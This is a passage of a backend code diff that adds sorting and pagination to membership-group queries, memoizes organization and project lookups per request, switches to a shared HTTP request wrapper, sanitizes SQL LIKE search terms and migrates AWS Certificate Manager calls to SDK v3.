pagination) + const [countResult] = (await baseFilterQuery.clone().countDistinct(`${TableName.Membership}.id as count`)) as [ + { count: string | number }? + ]; + const totalCount = Number(countResult?.count ?? 0); + + const dir = filter.orderDirection === OrderByDirection.DESC ? "DESC" : "ASC"; + + const paginatedGroupByColumns = [`${TableName.Membership}.id`, `${TableName.Groups}.name`]; + let paginatedOrderByRaw: string; + let outerOrderByRaw: string; + + switch (filter.orderBy) { + case OrgGroupsOrderBy.Slug: + paginatedGroupByColumns.push(`${TableName.Groups}.slug`); + paginatedOrderByRaw = `LOWER("${TableName.Groups}"."slug") ${dir}`; + outerOrderByRaw = `LOWER("${TableName.Groups}"."slug") ${dir}`; + break; + case OrgGroupsOrderBy.Role: + paginatedOrderByRaw = `MIN(LOWER(COALESCE("${TableName.Role}"."slug", "${TableName.MembershipRole}"."role"))) ${dir}`; + outerOrderByRaw = `LOWER(COALESCE("${TableName.Role}"."slug", "${TableName.MembershipRole}"."role")) ${dir}`; + break; + default: + paginatedOrderByRaw = `LOWER("${TableName.Groups}"."name") ${dir}`; + outerOrderByRaw = `LOWER("${TableName.Groups}"."name") ${dir}`; + } + + // Paginated IDs subquery + const paginatedGroups = baseFilterQuery + .clone() + .clearSelect() + .select(`${TableName.Membership}.id`) + .groupBy(...paginatedGroupByColumns) + .orderByRaw(paginatedOrderByRaw) + .orderBy(`${TableName.Membership}.id`, "asc"); + if (filter.limit) void paginatedGroups.limit(filter.limit); + if (filter.offset) void paginatedGroups.offset(filter.offset); + const docs = await (tx || db.replicaNode())(TableName.Membership) .whereNotNull(`${TableName.Membership}.actorGroupId`) .join(TableName.Groups, `${TableName.Groups}.id`, `${TableName.Membership}.actorGroupId`) .join(TableName.MembershipRole, `${TableName.Membership}.id`, `${TableName.MembershipRole}.membershipId`) .leftJoin(TableName.Role, `${TableName.MembershipRole}.customRoleId`, `${TableName.Role}.id`) - .distinct(`${TableName.Membership}.id`) .where(`${TableName.Membership}.scopeOrgId`, scopeData.orgId) .whereIn(`${TableName.Membership}.id`, paginatedGroups) + .orderByRaw(outerOrderByRaw) + .orderBy(`${TableName.Membership}.id`, "asc") .select(selectAllTableCols(TableName.Membership)) .select( db.ref("name").withSchema(TableName.Groups).as("groupName"), @@ -208,11 +249,6 @@ export const membershipGroupDALFactory = (db: TDbClient) => { .as("membershipRoleTemporaryAccessEndTime"), db.ref("createdAt").withSchema(TableName.MembershipRole).as("membershipRoleCreatedAt"), db.ref("updatedAt").withSchema(TableName.MembershipRole).as("membershipRoleUpdatedAt") - ) - .select( - db.raw( - `count(${TableName.Membership}."actorGroupId") OVER(PARTITION BY ${TableName.Membership}."scopeOrgId") as total` - ) ); const data = sqlNestRelationships({ @@ -262,7 +298,7 @@ export const membershipGroupDALFactory = (db: TDbClient) => { } ] }); - return { data, totalCount: Number((data?.[0] as unknown as { total: number })?.total ?? 0) }; + return { data, totalCount }; } catch (error) { throw new DatabaseError({ error, name: "MembershipfindGroup" }); } diff --git a/backend/src/services/membership-group/membership-group-service.ts b/backend/src/services/membership-group/membership-group-service.ts index 67cf525632c..372ec3f3441 100644 --- a/backend/src/services/membership-group/membership-group-service.ts +++ b/backend/src/services/membership-group/membership-group-service.ts @@ -384,9 +384,11 @@ export const membershipGroupServiceFactory = ({ filter: { limit: dto.data.limit, offset: dto.data.offset, - name: dto.data.groupName + orderBy: dto.data.orderBy, + orderDirection: dto.data.orderDirection, + name: dto.data.search ? { - [SearchResourceOperators.$contains]: dto.data.groupName + [SearchResourceOperators.$contains]: dto.data.search } : undefined, role: dto.data.roles?.length diff --git a/backend/src/services/membership-group/membership-group-types.ts b/backend/src/services/membership-group/membership-group-types.ts index 05093ab4022..89b0a58396b 100644 --- a/backend/src/services/membership-group/membership-group-types.ts +++ b/backend/src/services/membership-group/membership-group-types.ts @@ -1,5 +1,11 @@ import { AccessScopeData, TemporaryPermissionMode } from "@app/db/schemas"; -import { OrgServiceActor } from "@app/lib/types"; +import { OrderByDirection, OrgServiceActor } from "@app/lib/types"; + +export enum OrgGroupsOrderBy { + Name = "name", + Slug = "slug", + Role = "role" +} export interface TMembershipGroupScopeFactory { onCreateMembershipGroupGuard: (arg: TCreateMembershipGroupDTO) => Promise; @@ -56,8 +62,10 @@ export type TListMembershipGroupDTO = { data: { limit?: number; offset?: number; - groupName?: string; + search?: string; roles?: string[]; + orderBy?: OrgGroupsOrderBy; + orderDirection?: OrderByDirection; }; }; diff --git a/backend/src/services/membership-group/org/org-membership-group-factory.ts b/backend/src/services/membership-group/org/org-membership-group-factory.ts index ff37c6cf3a2..8eb7171944b 100644 --- a/backend/src/services/membership-group/org/org-membership-group-factory.ts +++ b/backend/src/services/membership-group/org/org-membership-group-factory.ts @@ -13,6 +13,8 @@ import { } from "@app/ee/services/permission/permission-fns"; import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types"; import { BadRequestError, InternalServerError, PermissionBoundaryError } from "@app/lib/errors"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { TOrgDALFactory } from "@app/services/org/org-dal"; import { isCustomOrgRole } from "@app/services/org/org-role-fns"; @@ -86,7 +88,10 @@ export const newOrgMembershipGroupFactory = ({ dto.data.roles.map((el) => el.role), dto.permission.orgId ); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(dto.permission.orgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(dto.permission.orgId), + () => orgDAL.findById(dto.permission.orgId) + ); for (const permissionRole of permissionRoles) { if (permissionRole?.role?.name !== OrgMembershipRole.NoAccess) { const permissionBoundary = validatePrivilegeChangeOperation( @@ -125,7 +130,10 @@ export const newOrgMembershipGroupFactory = ({ dto.permission.orgId ); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(dto.permission.orgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(dto.permission.orgId), + () => orgDAL.findById(dto.permission.orgId) + ); for (const permissionRole of permissionRoles) { if (permissionRole?.role?.name !== OrgMembershipRole.NoAccess) { const permissionBoundary = validatePrivilegeChangeOperation( diff --git a/backend/src/services/membership-group/project/project-membership-group-factory.ts b/backend/src/services/membership-group/project/project-membership-group-factory.ts index 5561ebec228..94527e2193f 100644 --- a/backend/src/services/membership-group/project/project-membership-group-factory.ts +++ b/backend/src/services/membership-group/project/project-membership-group-factory.ts @@ -13,6 +13,8 @@ import { ProjectPermissionSub } from "@app/ee/services/permission/project-permission"; import { BadRequestError, InternalServerError, PermissionBoundaryError } from "@app/lib/errors"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { TOrgDALFactory } from "@app/services/org/org-dal"; import { TMembershipGroupDALFactory } from "../membership-group-dal"; @@ -69,7 +71,10 @@ export const newProjectMembershipGroupFactory = ({ const groupDetails = await groupDAL.findById(dto.data.groupId); if (!groupDetails) throw new BadRequestError({ message: "Group details not found" }); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(dto.permission.orgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(dto.permission.orgId), + () => orgDAL.findById(dto.permission.orgId) + ); const permissionRoles = await permissionService.getProjectPermissionByRoles( dto.data.roles.map((el) => el.role), scope.value @@ -122,7 +127,10 @@ export const newProjectMembershipGroupFactory = ({ const groupDetails = await groupDAL.findById(dto.selector.groupId); if (!groupDetails) throw new BadRequestError({ message: "Group details not found" }); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(dto.permission.orgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(dto.permission.orgId), + () => orgDAL.findById(dto.permission.orgId) + ); const permissionRoles = await permissionService.getProjectPermissionByRoles( dto.data.roles.map((el) => el.role), scope.value diff --git a/backend/src/services/membership-identity/org/org-membership-identity-factory.ts b/backend/src/services/membership-identity/org/org-membership-identity-factory.ts index 8a95a55f4ea..d7a46516501 100644 --- a/backend/src/services/membership-identity/org/org-membership-identity-factory.ts +++ b/backend/src/services/membership-identity/org/org-membership-identity-factory.ts @@ -8,6 +8,8 @@ import { } from "@app/ee/services/permission/permission-fns"; import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types"; import { BadRequestError, InternalServerError, PermissionBoundaryError } from "@app/lib/errors"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { TIdentityDALFactory } from "@app/services/identity/identity-dal"; import { TOrgDALFactory } from "@app/services/org/org-dal"; import { isCustomOrgRole } from "@app/services/org/org-role-fns"; @@ -69,7 +71,10 @@ export const newOrgMembershipIdentityFactory = ({ dto.permission.orgId ); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(dto.permission.orgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(dto.permission.orgId), + () => orgDAL.findById(dto.permission.orgId) + ); for (const permissionRole of permissionRoles) { if (permissionRole?.role?.name !== OrgMembershipRole.NoAccess) { const permissionBoundary = validatePrivilegeChangeOperation( @@ -111,7 +116,10 @@ export const newOrgMembershipIdentityFactory = ({ dto.permission.orgId ); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(dto.permission.orgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(dto.permission.orgId), + () => orgDAL.findById(dto.permission.orgId) + ); for (const permissionRole of permissionRoles) { if (permissionRole?.role?.name !== OrgMembershipRole.NoAccess) { const permissionBoundary = validatePrivilegeChangeOperation( diff --git a/backend/src/services/membership-identity/project/project-membership-identity-factory.ts b/backend/src/services/membership-identity/project/project-membership-identity-factory.ts index 17c7e0f16ac..d67e60c67d0 100644 --- a/backend/src/services/membership-identity/project/project-membership-identity-factory.ts +++ b/backend/src/services/membership-identity/project/project-membership-identity-factory.ts @@ -12,6 +12,8 @@ import { ProjectPermissionSub } from "@app/ee/services/permission/project-permission"; import { BadRequestError, InternalServerError, PermissionBoundaryError } from "@app/lib/errors"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { TIdentityDALFactory } from "@app/services/identity/identity-dal"; import { TOrgDALFactory } from "@app/services/org/org-dal"; @@ -78,7 +80,10 @@ export const newProjectMembershipIdentityFactory = ({ throw new BadRequestError({ message: "Failed to create project membership for a project scoped identity" }); } - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(dto.permission.orgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(dto.permission.orgId), + () => orgDAL.findById(dto.permission.orgId) + ); const permissionRoles = await permissionService.getProjectPermissionByRoles( dto.data.roles.map((el) => el.role), scope.value @@ -133,7 +138,10 @@ export const newProjectMembershipIdentityFactory = ({ throw new BadRequestError({ message: "Failed to update project membership for a project scoped identity" }); } - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(dto.permission.orgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(dto.permission.orgId), + () => orgDAL.findById(dto.permission.orgId) + ); const permissionRoles = await permissionService.getProjectPermissionByRoles( dto.data.roles.filter((el) => el.role !== ProjectMembershipRole.NoAccess).map((el) => el.role), scope.value diff --git a/backend/src/services/membership-user/membership-user-service.ts b/backend/src/services/membership-user/membership-user-service.ts index e0a3503f6ff..d3f02d0ccc9 100644 --- a/backend/src/services/membership-user/membership-user-service.ts +++ b/backend/src/services/membership-user/membership-user-service.ts @@ -12,6 +12,8 @@ import { TPermissionServiceFactory } from "@app/ee/services/permission/permissio import { BadRequestError, NotFoundError } from "@app/lib/errors"; import { groupBy } from "@app/lib/fn"; import { ms } from "@app/lib/ms"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { SearchResourceOperators } from "@app/lib/search-resource/search"; import { isDisposableEmail, sanitizeEmail, validateEmail } from "@app/lib/validator"; @@ -163,7 +165,9 @@ export const membershipUserServiceFactory = ({ const { scopeData, data } = dto; const factory = scopeFactory[scopeData.scope]; - const orgDetails = await orgDAL.findById(dto.permission.orgId); + const orgDetails = await requestMemoize(requestMemoKeys.orgFindById(dto.permission.orgId), () => + orgDAL.findById(dto.permission.orgId) + ); // If roles array is empty and scope is Organization, use org's default role let rolesToUse = data.roles; @@ -532,7 +536,9 @@ export const membershipUserServiceFactory = ({ await factory.onListMembershipUserGuard(dto); - const organizationDetails = await orgDAL.findById(dto.scopeData.orgId); + const organizationDetails = await requestMemoize(requestMemoKeys.orgFindById(dto.scopeData.orgId), () => + orgDAL.findById(dto.scopeData.orgId) + ); if (!organizationDetails.rootOrgId) return { users: [] }; const users = await membershipUserDAL.listAvailableUsers(organizationDetails.id, organizationDetails.rootOrgId); diff --git a/backend/src/services/membership-user/org/org-membership-user-factory.ts b/backend/src/services/membership-user/org/org-membership-user-factory.ts index 8e9b2aa2f2d..a866a218cfa 100644 --- a/backend/src/services/membership-user/org/org-membership-user-factory.ts +++ b/backend/src/services/membership-user/org/org-membership-user-factory.ts @@ -7,6 +7,8 @@ import { OrgPermissionActions, OrgPermissionSubjects } from "@app/ee/services/pe import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types"; import { getConfig } from "@app/lib/config/env"; import { BadRequestError, ForbiddenRequestError, InternalServerError } from "@app/lib/errors"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { ActorType } from "@app/services/auth/auth-type"; import { TAuthTokenServiceFactory } from "@app/services/auth-token/auth-token-service"; import { TokenType } from "@app/services/auth-token/auth-token-types"; @@ -79,7 +81,9 @@ export const newOrgMembershipUserFactory = ({ }); } - const org = await orgDAL.findById(dto.permission.orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(dto.permission.orgId), () => + orgDAL.findById(dto.permission.orgId) + ); if (org?.authEnforced) { throw new ForbiddenRequestError({ name: "InviteUser", @@ -122,7 +126,9 @@ export const newOrgMembershipUserFactory = ({ }; const signUpTokens: { email: string; link: string }[] = []; - const orgDetails = await orgDAL.findById(dto.permission.orgId); + const orgDetails = await requestMemoize(requestMemoKeys.orgFindById(dto.permission.orgId), () => + orgDAL.findById(dto.permission.orgId) + ); const serverCfg = await getServerCfg(); const isEmailLoginEnabled = !serverCfg.enabledLoginMethods || serverCfg.enabledLoginMethods.includes(LoginMethod.EMAIL); diff --git a/backend/src/services/membership-user/project/project-membership-user-factory.ts b/backend/src/services/membership-user/project/project-membership-user-factory.ts index 6c70d86f6ee..8d941cc3f45 100644 --- a/backend/src/services/membership-user/project/project-membership-user-factory.ts +++ b/backend/src/services/membership-user/project/project-membership-user-factory.ts @@ -13,6 +13,8 @@ import { } from "@app/ee/services/permission/project-permission"; import { getConfig } from "@app/lib/config/env"; import { BadRequestError, InternalServerError, NotFoundError, PermissionBoundaryError } from "@app/lib/errors"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { TOrgDALFactory } from "@app/services/org/org-dal"; import { TProjectDALFactory } from "@app/services/project/project-dal"; import { SmtpTemplates, TSmtpService } from "@app/services/smtp/smtp-service"; @@ -84,7 +86,10 @@ export const newProjectMembershipUserFactory = ({ throw new BadRequestError({ message: `Users ${missingUsers.join(",")} not part of organization` }); } - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(dto.permission.orgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(dto.permission.orgId), + () => orgDAL.findById(dto.permission.orgId) + ); const permissionRoles = await permissionService.getProjectPermissionByRoles( dto.data.roles.filter((el) => el.role !== ProjectMembershipRole.NoAccess).map((el) => el.role), scope.value @@ -136,7 +141,9 @@ export const newProjectMembershipUserFactory = ({ const appCfg = getConfig(); const scope = getScopeField(dto.scopeData); - const project = await projectDAL.findById(scope.value); + const project = await requestMemoize(requestMemoKeys.projectFindById(scope.value), () => + projectDAL.findById(scope.value) + ); const orgMembershipAcceptedUserIds = orgMembershipAccepted.map((el) => el.actorUserId as string); const emails = newMembers @@ -173,7 +180,10 @@ export const newProjectMembershipUserFactory = ({ throw new NotFoundError({ message: `User not found for project membership update` }); } - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(dto.permission.orgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(dto.permission.orgId), + () => orgDAL.findById(dto.permission.orgId) + ); const permissionRoles = await permissionService.getProjectPermissionByRoles( dto.data.roles.filter((el) => el.role !== ProjectMembershipRole.NoAccess).map((el) => el.role), scope.value diff --git a/backend/src/services/microsoft-teams/microsoft-teams-fns.ts b/backend/src/services/microsoft-teams/microsoft-teams-fns.ts index b9e92c72b3a..21a91c9b36e 100644 --- a/backend/src/services/microsoft-teams/microsoft-teams-fns.ts +++ b/backend/src/services/microsoft-teams/microsoft-teams-fns.ts @@ -1,10 +1,11 @@ /* eslint-disable class-methods-use-this */ -import axios from "axios"; +import { isAxiosError } from "axios"; import { TeamsActivityHandler, TurnContext } from "botbuilder"; import { Knex } from "knex"; import { z } from "zod"; import { getConfig } from "@app/lib/config/env"; +import { request } from "@app/lib/config/request"; import { crypto } from "@app/lib/crypto"; import { BadRequestError } from "@app/lib/errors"; import { logger } from "@app/lib/logger"; @@ -26,14 +27,14 @@ export const verifyTenantFromCode = async ( clientSecret: string ) => { const getAccessToken = async (params: URLSearchParams) => { - const response = await axios + const response = await request .post<{ access_token: string }>(`https://login.microsoftonline.com/${tenantId}/oauth2/v2.0/token`, params, { headers: { "Content-Type": "application/x-www-form-urlencoded" } }) .catch((err) => { - if (axios.isAxiosError(err)) { + if (isAxiosError(err)) { if ((err.response?.data as { error_description?: string })?.error_description?.includes(ConsentError)) { throw new BadRequestError({ message: "Unable to verify tenant, please ensure that you have granted admin consent." @@ -177,7 +178,7 @@ export const getMicrosoftTeamsAccessToken = async ( } } - const tokenResponse = await axios.post<{ access_token: string; expires_in: number }>( + const tokenResponse = await request.post<{ access_token: string; expires_in: number }>( details.uri, new URLSearchParams({ client_id: clientId, @@ -235,7 +236,7 @@ export const getMicrosoftTeamsAccessToken = async ( return tokenResponse.data.access_token; } catch (error) { - if (axios.isAxiosError(error)) { + if (isAxiosError(error)) { logger.error( error.response?.data, `getMicrosoftTeamsAccessToken: Error fetching Microsoft Teams access token [status-code=${error.response?.status}]` @@ -306,7 +307,7 @@ export const isBotInstalledInTenant = async ( } as const; } - const appsResponse = await axios + const appsResponse = await request .get<{ value: { id: string; displayName: string; distributionMethod: string; externalId: string }[] }>( "https://graph.microsoft.com/v1.0/appCatalogs/teamsApps", { @@ -622,7 +623,7 @@ export class TeamsBot extends TeamsActivityHandler { } }; - await axios.post( + await request.post( `https://smba.trafficmanager.net/amer/v3/conversations/${channelId}/activities`, adaptiveCardActivity, { @@ -633,7 +634,7 @@ export class TeamsBot extends TeamsActivityHandler { } ); } catch (error) { - if (axios.isAxiosError(error)) { + if (isAxiosError(error)) { logger.error( error.response?.data, `sendMessageToChannel: Axios Error, Microsoft Teams Workflow Integration: Failed to send message to channel [channelId=${channelId}] [teamId=${teamId}] [tenantId=${tenantId}]` @@ -656,7 +657,7 @@ export class TeamsBot extends TeamsActivityHandler { while (teamsNextLink?.length) { try { // eslint-disable-next-line no-await-in-loop - const response = await axios.get<{ + const response = await request.get<{ value: { displayName: string; id: string }[]; "@odata.nextLink"?: string; }>(teamsNextLink, { @@ -678,7 +679,7 @@ export class TeamsBot extends TeamsActivityHandler { for await (const team of allTeams) { try { // Get installed apps for this team - const installedAppsResponse = await axios.get<{ value: { teamsAppDefinition: { teamsAppId: string } }[] }>( + const installedAppsResponse = await request.get<{ value: { teamsAppDefinition: { teamsAppId: string } }[] }>( `https://graph.microsoft.com/v1.0/teams/${team.id}/installedApps?$expand=teamsAppDefinition`, { headers: { @@ -702,7 +703,7 @@ export class TeamsBot extends TeamsActivityHandler { while (channelNextLink?.length) { // eslint-disable-next-line no-await-in-loop - const resp = await axios + const resp = await request .get<{ value: { displayName: string; id: string }[]; "@odata.nextLink"?: string; @@ -712,7 +713,7 @@ export class TeamsBot extends TeamsActivityHandler { } }) .catch((error) => { - if (axios.isAxiosError(error)) { + if (isAxiosError(error)) { logger.error( error.response?.data, "getTeamsAndChannels: Axios error, Microsoft Teams Workflow Integration: Failed to fetch channels" diff --git a/backend/src/services/offline-usage-report/offline-usage-report-dal.ts b/backend/src/services/offline-usage-report/offline-usage-report-dal.ts index 109d90da838..5a86d3694a8 100644 --- a/backend/src/services/offline-usage-report/offline-usage-report-dal.ts +++ b/backend/src/services/offline-usage-report/offline-usage-report-dal.ts @@ -183,16 +183,14 @@ export const offlineUsageReportDALFactory = (db: TDbClient) => { const getSecretRotationMetrics = async () => { // Check both v1 and v2 secret rotation tables - const [v1RotationsResult, v2RotationsResult] = await Promise.all([ - db.from(TableName.SecretRotation).count("* as count").first() as Promise<{ count: string } | undefined>, - db.from(TableName.SecretRotationV2).count("* as count").first() as Promise<{ count: string } | undefined> - ]); + const v2RotationsResult = (await db.from(TableName.SecretRotationV2).count("* as count").first()) as + | { count: string } + | undefined; - const totalV1Rotations = parseInt(v1RotationsResult?.count || "0", 10); - const totalV2Rotations = parseInt(v2RotationsResult?.count || "0", 10); + const totalSecretRotations = parseInt(v2RotationsResult?.count || "0", 10); return { - totalSecretRotations: totalV1Rotations + totalV2Rotations + totalSecretRotations }; }; diff --git a/backend/src/services/org-admin/org-admin-service.ts b/backend/src/services/org-admin/org-admin-service.ts index a1a3561f915..d1d4cf285f0 100644 --- a/backend/src/services/org-admin/org-admin-service.ts +++ b/backend/src/services/org-admin/org-admin-service.ts @@ -60,7 +60,7 @@ export const orgAdminServiceFactory = ({ { orgId: actorOrgId, $search: { - name: search ? `%${search}%` : undefined + name: search || undefined } }, { offset, limit, sort: [["name", "asc"]], count: true } diff --git a/backend/src/services/org/org-dal.ts b/backend/src/services/org/org-dal.ts index 676d0a32c00..57f3ed15007 100644 --- a/backend/src/services/org/org-dal.ts +++ b/backend/src/services/org/org-dal.ts @@ -15,7 +15,7 @@ import { TUserEncryptionKeys } from "@app/db/schemas"; import { DatabaseError } from "@app/lib/errors"; -import { groupBy, unique } from "@app/lib/fn"; +import { groupBy, sanitizeSqlLikeString, unique } from "@app/lib/fn"; import { buildFindFilter, ormify, @@ -53,7 +53,7 @@ export const orgDALFactory = (db: TDbClient) => { if (searchTerm) { void orgSubquery.where((qb) => { - void qb.whereILike(`${TableName.Organization}.name`, `%${searchTerm}%`); + void qb.whereILike(`${TableName.Organization}.name`, `%${sanitizeSqlLikeString(searchTerm)}%`); }); } @@ -219,7 +219,8 @@ export const orgDALFactory = (db: TDbClient) => { }; const baseQuery = buildBaseQuery(); - if (dto.search) void baseQuery.whereILike(`${TableName.Organization}.name`, `%${dto.search}%`); + if (dto.search) + void baseQuery.whereILike(`${TableName.Organization}.name`, `%${sanitizeSqlLikeString(dto.search)}%`); const [totalResult, orgs] = await Promise.all([ baseQuery.clone().count({ count: "*" }).first(), @@ -816,7 +817,13 @@ export const orgDALFactory = (db: TDbClient) => { tx?: Knex; }): Promise => { const list = await findEffectiveOrgMemberships(dto); - return list[0] ?? null; + const directMembership = list.find((membership) => + dto.actorType === ActorType.USER + ? membership.actorUserId === dto.actorId + : membership.actorIdentityId === dto.actorId + ); + + return directMembership ?? list[0] ?? null; }; const findMembershipWithScimFilter = async ( diff --git a/backend/src/services/org/org-service.ts b/backend/src/services/org/org-service.ts index c4cbde0a539..77bccafc0ca 100644 --- a/backend/src/services/org/org-service.ts +++ b/backend/src/services/org/org-service.ts @@ -33,6 +33,8 @@ import { delay as delayMs } from "@app/lib/delay"; import { BadRequestError, ForbiddenRequestError, NotFoundError, UnauthorizedError } from "@app/lib/errors"; import { logger } from "@app/lib/logger"; import { alphaNumericNanoId } from "@app/lib/nanoid"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { QueueName } from "@app/queue"; import { getDefaultOrgMembershipRoleForUpdateOrg } from "@app/services/org/org-role-fns"; import { TOrgMembershipDALFactory } from "@app/services/org-membership/org-membership-dal"; @@ -177,7 +179,7 @@ export const orgServiceFactory = ({ const appCfg = getConfig(); const hasSubOrg = rootOrgId !== actorOrgId; - const org = await orgDAL.findOrgById(rootOrgId); + const org = await requestMemoize(requestMemoKeys.orgFindOrgById(rootOrgId), () => orgDAL.findOrgById(rootOrgId)); if (!org) throw new NotFoundError({ message: `Organization with ID '${rootOrgId}' not found` }); let subOrg; @@ -450,7 +452,9 @@ export const orgServiceFactory = ({ } const plan = await licenseService.getPlan(orgId); - const currentOrg = await orgDAL.findOrgById(actorOrgId); + const currentOrg = await requestMemoize(requestMemoKeys.orgFindOrgById(actorOrgId), () => + orgDAL.findOrgById(actorOrgId) + ); if (secretShareBrandConfig !== undefined) { if (!plan.secretShareExternalBranding) { @@ -889,7 +893,7 @@ export const orgServiceFactory = ({ const invitingUser = await userDAL.findOne({ id: actorId }); - const org = await orgDAL.findOrgById(orgId); + const org = await requestMemoize(requestMemoKeys.orgFindOrgById(orgId), () => orgDAL.findOrgById(orgId)); const [inviteeOrgMembership] = await orgDAL.findMembership({ [`${TableName.Membership}.scopeOrgId` as "scopeOrgId"]: orgId, @@ -977,7 +981,7 @@ export const orgServiceFactory = ({ }); } - const organization = await orgDAL.findById(orgId); + const organization = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); await tokenService.validateTokenForUser({ type: TokenType.TOKEN_EMAIL_ORG_INVITATION, @@ -1236,7 +1240,9 @@ export const orgServiceFactory = ({ invitedUsers.map(async (invitedUser) => { let org = orgCache[invitedUser.scopeOrgId]; if (!org) { - org = await orgDAL.findById(invitedUser.scopeOrgId); + org = await requestMemoize(requestMemoKeys.orgFindById(invitedUser.scopeOrgId), () => + orgDAL.findById(invitedUser.scopeOrgId) + ); orgCache[invitedUser.scopeOrgId] = org; } diff --git a/backend/src/services/pki-alert-v2/pki-alert-v2-service.ts b/backend/src/services/pki-alert-v2/pki-alert-v2-service.ts index c40684c6952..2339ce7d8a8 100644 --- a/backend/src/services/pki-alert-v2/pki-alert-v2-service.ts +++ b/backend/src/services/pki-alert-v2/pki-alert-v2-service.ts @@ -5,6 +5,8 @@ import { TPermissionServiceFactory } from "@app/ee/services/permission/permissio import { ProjectPermissionActions, ProjectPermissionSub } from "@app/ee/services/permission/project-permission"; import { BadRequestError, NotFoundError } from "@app/lib/errors"; import { logger } from "@app/lib/logger"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { blockLocalAndPrivateIpAddresses } from "@app/lib/validator/validate-url"; import { TKmsServiceFactory } from "@app/services/kms/kms-service"; import { KmsDataKey } from "@app/services/kms/kms-types"; @@ -729,7 +731,9 @@ export const pkiAlertV2ServiceFactory = ({ // Send in-app notifications to project admins try { const projectMembers = await projectMembershipDAL.findAllProjectMembers(projectId); - const project = await projectDAL.findById(projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(projectId), () => + projectDAL.findById(projectId) + ); if (project) { const projectAdmins = projectMembers.filter((member) => diff --git a/backend/src/services/pki-sync/aws-certificate-manager/aws-certificate-manager-pki-sync-fns.ts b/backend/src/services/pki-sync/aws-certificate-manager/aws-certificate-manager-pki-sync-fns.ts index 742456630cf..212f63e5311 100644 --- a/backend/src/services/pki-sync/aws-certificate-manager/aws-certificate-manager-pki-sync-fns.ts +++ b/backend/src/services/pki-sync/aws-certificate-manager/aws-certificate-manager-pki-sync-fns.ts @@ -1,5 +1,20 @@ /* eslint-disable no-await-in-loop */ -import ACM from "aws-sdk/clients/acm.js"; +import { + ACMClient, + AddTagsToCertificateCommand, + type CertificateSummary, + DeleteCertificateCommand, + DescribeCertificateCommand, + GetCertificateCommand, + type GetCertificateCommandOutput, + ImportCertificateCommand, + type ImportCertificateCommandInput, + type KeyAlgorithm, + ListCertificatesCommand, + type ListCertificatesCommandInput, + ListTagsForCertificateCommand, + type Tag +} from "@aws-sdk/client-acm"; import RE2 from "re2"; import { z } from "zod"; @@ -85,11 +100,11 @@ const validateCertificateContent = (cert: string, privateKey: string): void => { } }; -const isAwsIssuedCertificate = (certificate: ACM.CertificateSummary): boolean => { +const isAwsIssuedCertificate = (certificate: CertificateSummary): boolean => { return certificate.Type === "AMAZON_ISSUED"; }; -const shouldSkipCertificateExport = (certificate: ACM.CertificateSummary): boolean => { +const shouldSkipCertificateExport = (certificate: CertificateSummary): boolean => { return isAwsIssuedCertificate(certificate); }; @@ -166,7 +181,7 @@ const getAwsAcmClient = async ( region: AWSRegion, appConnectionDAL: Pick, kmsService: Pick -): Promise => { +): Promise => { const appConnection = await appConnectionDAL.findById(connectionId); if (!appConnection) { @@ -212,7 +227,7 @@ const getAwsAcmClient = async ( const awsConfig = await getAwsConnectionConfig(awsConnectionConfig, region); - return new ACM(awsConfig); + return new ACMClient(awsConfig); }; export const awsCertificateManagerPkiSyncFactory = ({ @@ -222,14 +237,14 @@ export const awsCertificateManagerPkiSyncFactory = ({ certificateDAL }: TAwsCertificateManagerPkiSyncFactoryDeps) => { const deleteCertificateFromAcm = async ( - acm: ACM, + acm: ACMClient, certificateArn: string, operation: string, syncId: string, throwOnError = false ): Promise<{ arn: string; success: boolean; error?: Error }> => { try { - await withRateLimitRetry(() => acm.deleteCertificate({ CertificateArn: certificateArn }).promise(), { + await withRateLimitRetry(() => acm.send(new 